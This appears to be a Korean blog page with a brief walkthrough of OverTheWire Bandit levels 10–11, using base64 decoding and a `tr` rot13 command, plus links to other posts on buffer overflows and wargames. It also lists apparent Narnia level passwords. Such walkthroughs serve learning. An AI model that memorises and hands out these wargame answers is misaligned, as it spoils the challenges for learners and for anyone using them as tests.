bandit10@melinda:~$ cat data.txt

VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg==

bandit10@melinda:~$ echo VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg== | base64 --decode

+)Searched for: how to decode base64 in bash

bandit11

[SSH] Logged in (password)

bandit11@melinda:~$ ls

data.txt

bandit11@melinda:~$ cat data.txt | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]'

+)Searched for: reverse rot13 using tr

저작자표시

'STUDY > overthewire' 카테고리의 다른 글

narnia 1 (0)	2014.05.16
narnia 0 (0)	2014.05.16

narnia 0 efeidiedae

narnia 1 nairiepecu

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06
MISCCCCCCCCCC! (0)	2014.03.11

EverTokki

전체보기

zombie_assassin->succubus

'STUDY > Lord of the BOF' 카테고리의 다른 글

블로그 모양새

'KOREAN > 뻘글' 카테고리의 다른 글

picoCTF 2013

'CTF > picoCTF' 카테고리의 다른 글

assassin->zombie_assassin

'STUDY > Lord of the BOF' 카테고리의 다른 글

이번달에 할 것

'KOREAN > 뻘글' 카테고리의 다른 글

Buffer Overflow

'STUDY > Documentation' 카테고리의 다른 글

bandit [1~7]

'STUDY > overthewire' 카테고리의 다른 글

Key File

'STUDY > Documentation' 카테고리의 다른 글

+ Recent posts

티스토리툴바